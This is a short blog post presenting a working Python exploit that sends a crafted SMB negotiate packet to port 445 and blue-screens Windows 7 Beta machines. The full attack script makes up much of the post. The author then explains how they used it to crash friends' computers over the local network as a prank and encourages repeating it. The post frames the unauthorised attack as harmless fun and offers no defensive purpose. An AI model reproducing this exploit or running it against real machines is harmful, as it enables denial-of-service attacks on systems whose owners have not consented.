Crash Windows 7 Beta0

I know this is old, but I want to post it since I wasn’t able to write to this blog until today. Windows 7 Beta, and first corporate release had a smb bug. The attacker could send a crafted packet to the smb service and blue screen the machine. The exploit is very simple.

#!/usr/bin/python
from socket import socket
from time import sleep
host = "192.168.1.103", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Now I did not write this code, but I did use it to my advantage. Let’s just say it helps with convincing people to switch to a Mac or Linux so here is how to use it.

Load the python app on any Linux computer on the same network as the target machine. Edit the file and change the host. Get your buddy on IM and ask them how they are liking windows 7, when they tell you “Oh it’s great it’s fast way better then Vista” Crash the machine. immediately set a ping up on your machine and watch for the replies to come back in, your buddy should be back on IM, ask them what happened, they will respond with “Oh Windows 7 crashed” Then laugh, rinse and repeat…

The exploit is old and should only be used in good fun, it was fun for me.

Be Sociable, Share!

•